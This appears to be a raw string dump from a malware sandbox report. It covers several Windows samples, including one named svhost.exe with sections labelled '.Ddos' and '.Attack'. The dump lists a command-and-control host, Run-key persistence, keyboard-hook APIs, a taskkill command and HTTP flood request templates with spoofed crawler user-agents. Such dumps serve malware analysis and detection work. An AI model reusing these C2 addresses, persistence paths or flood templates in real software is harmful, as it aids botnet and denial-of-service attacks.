wininet.dll
wininet.dll
InternetOpenUrlA
InternetOpenUrlA
VBA6.DLL
VBA6.DLL
%System%\msvbvm60.dll\3
%System%\msvbvm60.dll\3
Password
Password
WebBrowser2
WebBrowser2
WebBrowser1
WebBrowser1
)o4.tr
)o4.tr
sUrl
sUrl
sSrvCmd
sSrvCmd
sSrvPassword
sSrvPassword
\journey.exe
\journey.exe
\kindness.exe
\kindness.exe
\kingdom.exe
\kingdom.exe
\knack.exe
\knack.exe
\knead.exe
\knead.exe
\knee.exe
\knee.exe
\time.dll
\time.dll
\weathers.exe
\weathers.exe
hXXp://mini.yoyolm.net/ta2/?flag=
hXXp://mini.yoyolm.net/ta2/?flag=
hXXp://mini.yoyolm.net/ta3/?flag=
hXXp://mini.yoyolm.net/ta3/?flag=
hXXp://time.yoyolm.net/newh1/
hXXp://time.yoyolm.net/newh1/
hXXp://time.yoyolm.net/newh2/
hXXp://time.yoyolm.net/newh2/
hXXp://time.yoyolm.net/newh3/
hXXp://time.yoyolm.net/newh3/
hXXp://mini.yoyolm.net/new/
hXXp://mini.yoyolm.net/new/
\setings.ini
\setings.ini
hXXp://mini.yoyolm.net/ta1/?flag=
hXXp://mini.yoyolm.net/ta1/?flag=
(C) hXXp://VVV.tqshopping.com/
(C) hXXp://VVV.tqshopping.com/
manual.exe
manual.exe
ignite.exe_432_rwx_012F1000_00018000:
%SQVW
%SQVW
<.tbwij>
<.tbwij>
<.tc>
<.tc>
WinHttp.WinHttpRequest.5.1
WinHttp.WinHttpRequest.5.1
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
kernel32.dll
kernel32.dll
hXXp://VVV.baidu.com/
hXXp://VVV.baidu.com/
msvcrt.dll
msvcrt.dll
NTSHRUI.DLL
NTSHRUI.DLL
COMCTL32.DLL
COMCTL32.DLL
shell32.dll
shell32.dll
\QZaweewertghebh.dat
\QZaweewertghebh.dat
WScript.Shell
WScript.Shell
WScript.Shell_ERR
WScript.Shell_ERR
setting.ini
setting.ini
set.ini
set.ini
Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
VBScript.RegExp
VBScript.RegExp
RegOpenKeyExA
RegOpenKeyExA
CreateDialogIndirectParamA
CreateDialogIndirectParamA
ExitWindowsEx
ExitWindowsEx
SetWindowsHookExA
SetWindowsHookExA
UnhookWindowsHookEx
UnhookWindowsHookEx
A.eMk$)B$)B$)B$)B$)B$)B$)B2$!
A.eMk$)B$)B$)B$)B$)B$)B$)B2$!
.text
.text
`.data
`.data
.link
.link
.rloc
.rloc
NTSHRUI.DL
NTSHRUI.DL
.lnk[she
.lnk[she
.baidu.
.baidu.
KeyG
KeyG
.dN"u
.dN"u
.linke
.linke
mankind.exe_528:
.text
.text
`.data
`.data
.rsrc
.rsrc
GDIPLUS.DLL
GDIPLUS.DLL
gdi32.dll
gdi32.dll
kernel32.dll
kernel32.dll
NTDLL.DLL
NTDLL.DLL
user32.dll
user32.dll
MSVBVM60.DLL
MSVBVM60.DLL
6.vmmvv
6.vmmvv
pVVV.6
pVVV.6
H.yyywsTSTpxyyywfP
H.yyywsTSTpxyyywfP
SHDocVwCtl.WebBrowser
SHDocVwCtl.WebBrowser
.aicAlphaImage
.aicAlphaImage
.ucListBox
.ucListBox
iTXtXML:com.adobe.xmp
iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
2014-03-08
2014-03-08
.ucShadow
.ucShadow
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
2014/01/15
2014/01/15
#vb6chs.dll
#vb6chs.dll
.OsenXPComboBox
.OsenXPComboBox
.CommandButton
.CommandButton
.LbDate
.LbDate
.OsenXPDTPicker
.OsenXPDTPicker
.OsenXPSpin
.OsenXPSpin
shdocvw.dll
shdocvw.dll
WebBrowser
WebBrowser
%Program Files%\VB
%Program Files%\VB
\VB6.OLB
\VB6.OLB
#Web1
#Web1
0%System%\shdocvw.oca
0%System%\shdocvw.oca
%System%\mshtml.tlb
%System%\mshtml.tlb
URLEncode1
URLEncode1
time.dll
time.dll
wininet.dll
wininet.dll
InternetOpenUrlA
InternetOpenUrlA
comctl32.dll
comctl32.dll
winmm.dll
winmm.dll
%System%\msvbvm60.dll\3
%System%\msvbvm60.dll\3
WriteIniKey
WriteIniKey
GetIniKey
GetIniKey
DelIniKey
DelIniKey
advapi32.dll
advapi32.dll
RegCloseKey
RegCloseKey
RegOpenKeyA
RegOpenKeyA
Replace.dll
Replace.dll
Password
Password
GetAsyncKeyState
GetAsyncKeyState
SetWindowsHookExA
SetWindowsHookExA
UnhookWindowsHookEx
UnhookWindowsHookEx
VBA6.DLL
VBA6.DLL
msvbvm60.dll
msvbvm60.dll
olepro32.dll
olepro32.dll
msimg32.dll
msimg32.dll
shell32.dll
shell32.dll
F%System%\stdole2.tlb
F%System%\stdole2.tlb
GdiplusShutdown
GdiplusShutdown
gdiplus.dll
gdiplus.dll
zlib.dll
zlib.dll
zlib1.dll
zlib1.dll
__vbaStopExe
__vbaStopExe
KeyDown
KeyDown
KeyPress
KeyPress
KeyUp
KeyUp
cmdBrowse
cmdBrowse
cmdClipBoard
cmdClipBoard
comdlg32.dll
comdlg32.dll
AddMsg
AddMsg
DelMsg
DelMsg
\ctl\WinSubHook.tlb
\ctl\WinSubHook.tlb
IsSysShadowEnabled
IsSysShadowEnabled
GetProcessHeap
GetProcessHeap
SetMsgHook
SetMsgHook
SetMsgUnHook
SetMsgUnHook
ole32.dll
ole32.dll
==?==?==?==?==?
==?==?==?==?==?
==?==?==?
==?==?==?
2003/07/13
2003/07/13
strURL
strURL
strKey
strKey
KeyWord
KeyWord
uMsg
uMsg
sSrvCmd
sSrvCmd
sSrvPassword
sSrvPassword
KeyCode
KeyCode
KeyAscii
KeyAscii
Occurs when data is dropped onto the control via an OLE drag/drop operation, and OLEDropMode is set to manual
Occurs when data is dropped onto the control via an OLE drag/drop operation, and OLEDropMode is set to manual
Occurs when the mouse is moved over the control during an OLE drag/drop operation, if its OLEDropMode property is set to manual
Occurs when the mouse is moved over the control during an OLE drag/drop operation, if its OLEDropMode property is set to manual
Return whether the OS supports layered windows.
Return whether the OS supports layered windows.
Return whether the OS settings suggest that shadows should be employed. Only truly valid on Windows XP, Windows 2000 will always return True. It is up to the programmer as whether this setting is honored.
Return whether the OS settings suggest that shadows should be employed. Only truly valid on Windows XP, Windows 2000 will always return True. It is up to the programmer as whether this setting is honored.
Return whether we're running under Windows XP.
Return whether we're running under Windows XP.
Returns a handle (from Microsoft Windows) to an object's window.
Returns a handle (from Microsoft Windows) to an object's window.
Returns the number of items in the list portion of a control.
Returns the number of items in the list portion of a control.
Occurs when the user presses and releases an ANSI key.
Occurs when the user presses and releases an ANSI key.
Qh$%C
Qh$%C
Rh0%C
Rh0%C
PhT%C
PhT%C
Qhd%C
Qhd%C
Qh0%C
Qh0%C
FTPj
FTPj
\tclock.ini
\tclock.ini
tray_yes.png
tray_yes.png
tray_no.png
tray_no.png
\time.dll
\time.dll
Software\Microsoft\Windows\CurrentVersion\run
Software\Microsoft\Windows\CurrentVersion\run
.exe" /t
.exe" /t
hXXp://VVV.weather.com.cn/weather/
hXXp://VVV.weather.com.cn/weather/
.shtml
.shtml
cmd.exe /c taskkill /im
cmd.exe /c taskkill /im
C:\\Program Files\\Internet Explorer\\IEXPLORE.exe
C:\\Program Files\\Internet Explorer\\IEXPLORE.exe
huangli.xml
huangli.xml
\journey.exe
\journey.exe
\kindness.exe
\kindness.exe
\kingdom.exe
\kingdom.exe
\knack.exe
\knack.exe
\knead.exe
\knead.exe
\knee.exe
\knee.exe
1.png
1.png
setting.ini
setting.ini
ddd.png
ddd.png
\Replace.dll
\Replace.dll
\Replace64.dll
\Replace64.dll
\uTray.exe
\uTray.exe
city.txt
city.txt
toolbar_hover (3).png
toolbar_hover (3).png
2.png
2.png
3.png
3.png
button_p_pushed.png
button_p_pushed.png
button_p_hover.png
button_p_hover.png
00:00:00
00:00:00
hXXp://VVV.baidu.com/s?wd=天气预报&rsv_bp=0&ch=&tn=baidu&bar=&rsv_spt=3&ie=utf-8&rsv_sug3=5&rsv_sug4=565&rsv_sug1=5&oq=天气&rsv_sug2=0&f=3&rsp=0&inputT=9
hXXp://VVV.baidu.com/s?wd=天气预报&rsv_bp=0&ch=&tn=baidu&bar=&rsv_spt=3&ie=utf-8&rsv_sug3=5&rsv_sug4=565&rsv_sug1=5&oq=天气&rsv_sug2=0&f=3&rsp=0&inputT=9
hXXp://VVV.baidu.com/s?wd=
hXXp://VVV.baidu.com/s?wd=
\Weather_none.png
\Weather_none.png
18:00:00
18:00:00
08:00:00
08:00:00
Refresh_pushed.png
Refresh_pushed.png
Refresh_normal.png
Refresh_normal.png
Refresh_hover.png
Refresh_hover.png
{1D5BE4B5-FA4A-452D-9CDD-5DB35105E7EB}
{1D5BE4B5-FA4A-452D-9CDD-5DB35105E7EB}
.cb_Callback
.cb_Callback
*gif;*.bmp;*.jpg;*.jpeg;*.ico;*.cur;*.wmf;*.emf;*.png
*gif;*.bmp;*.jpg;*.jpeg;*.ico;*.cur;*.wmf;*.emf;*.png
*.bmp
*.bmp
*.gif
*.gif
*.ico;*.cur
*.ico;*.cur
*.jpg;*.jpeg
*.jpg;*.jpeg
*.wmf;*.emf
*.wmf;*.emf
*.png
*.png
Windows Meta File
Windows Meta File
Provider=Microsoft.Jet.OLEDB.4.0;Data Source=
Provider=Microsoft.Jet.OLEDB.4.0;Data Source=
\uCalendar\db2.mdb;Persist Security Info=False
\uCalendar\db2.mdb;Persist Security Info=False
Msxml2.XMLHTTP.3.0
Msxml2.XMLHTTP.3.0
application/x-www-form-urlencoded
application/x-www-form-urlencoded
\uTray.exe"
\uTray.exe"
0000000
0000000
DragFullWindows
DragFullWindows
0123456789
0123456789
\uCalendar\input.png
\uCalendar\input.png
\uCalendar\button_3a.png
\uCalendar\button_3a.png
\uCalendar\button_3b.png
\uCalendar\button_3b.png
\uCalendar\tip.png
\uCalendar\tip.png
\uCalendar\NewIcons007.png
\uCalendar\NewIcons007.png
\uCalendar\button_state5.png
\uCalendar\button_state5.png
\uCalendar\setting.ini
\uCalendar\setting.ini
(C) hXXp://VVV.tqshopping.com/
(C) hXXp://VVV.tqshopping.com/
weathers.exe
weathers.exe
mankind.exe_528_rwx_01C61000_00018000:
%SQVW
%SQVW
<.tbwij>
<.tbwij>
<.tc>
<.tc>
WinHttp.WinHttpRequest.5.1
WinHttp.WinHttpRequest.5.1
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
kernel32.dll
kernel32.dll
hXXp://VVV.baidu.com/
hXXp://VVV.baidu.com/
msvcrt.dll
msvcrt.dll
NTSHRUI.DLL
NTSHRUI.DLL
COMCTL32.DLL
COMCTL32.DLL
shell32.dll
shell32.dll
\QZaweewertghebh.dat
\QZaweewertghebh.dat
WScript.Shell
WScript.Shell
WScript.Shell_ERR
WScript.Shell_ERR
setting.ini
setting.ini
set.ini
set.ini
Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
VBScript.RegExp
VBScript.RegExp
RegOpenKeyExA
RegOpenKeyExA
CreateDialogIndirectParamA
CreateDialogIndirectParamA
ExitWindowsEx
ExitWindowsEx
SetWindowsHookExA
SetWindowsHookExA
UnhookWindowsHookEx
UnhookWindowsHookEx
A.eMk$)B$)B$)B$)B$)B$)B$)B2$!
A.eMk$)B$)B$)B$)B$)B$)B$)B2$!
.text
.text
`.data
`.data
.link
.link
.rloc
.rloc
NTSHRUI.DL
NTSHRUI.DL
.lnk[she
.lnk[she
.baidu.
.baidu.
KeyG
KeyG
.dN"u
.dN"u
.linke
.linke
svhost.exe_628:
.Buffer
.Buffer
`.Ddos
`.Ddos
`.text
`.text
.Breakth
.Breakth
`.Socket
`.Socket
`.SocketB
`.SocketB
`.Attack
`.Attack
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
MSVCRT.dll
MSVCRT.dll
_acmdln
_acmdln
WS2_32.dll
WS2_32.dll
WINMM.dll
WINMM.dll
iphlpapi.dll
iphlpapi.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion
t Explorer\iexplore.exe
t Explorer\iexplore.exe
#0%s!
#0%s!
%s/%s
%s/%s
GET %s?=%d HTTP/1.1
GET %s?=%d HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; hXXp://VVV.baidu.com/search/spider.html)
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; hXXp://VVV.baidu.com/search/spider.html)
Host: %s
Host: %s
GET / HTTP/1.1
GET / HTTP/1.1
Host: %s:%d
Host: %s:%d
GET %s HTTP/1.1
GET %s HTTP/1.1
User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0
User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0
Host: %sContent-Type: text/html
Host: %sContent-Type: text/html
User-Agent:Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.0; MyIE 3.01;Baiduspider/2.0; hXXp://VVV.baidu.com/search/spider.html)
User-Agent:Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.0; MyIE 3.01;Baiduspider/2.0; hXXp://VVV.baidu.com/search/spider.html)
%s %s%s
%s %s%s
User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
Referer: hXXp://%s
Referer: hXXp://%s
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; hXXp://VVV.baidu.com/search/spider.html)
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; hXXp://VVV.baidu.com/search/spider.html)
%d.%d.%d.%d
%d.%d.%d.%d
192.168.1.244
192.168.1.244
chinaljndk.3322.org:9999
chinaljndk.3322.org:9999
994175033994175033
994175033994175033
InternetOpenUrlA
InternetOpenUrlA
hra%u.dll
hra%u.dll
%d.exe
%d.exe
SOFTWARE.LOG
SOFTWARE.LOG
kernel32.dll
kernel32.dll
ddd
ddd
dwNumEntries = %u
dwNumEntries = %u
.rdata
.rdata
@.reloc
@.reloc
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
lpk.addon
lpk.addon
lpk.dll
lpk.dll
7"7'737?7
7"7'737?7
v.qju
v.qju
.gc[_
.gc[_
svhost.exe_628_rwx_00413000_00005000:
v.qju
v.qju
.gc[_
.gc[_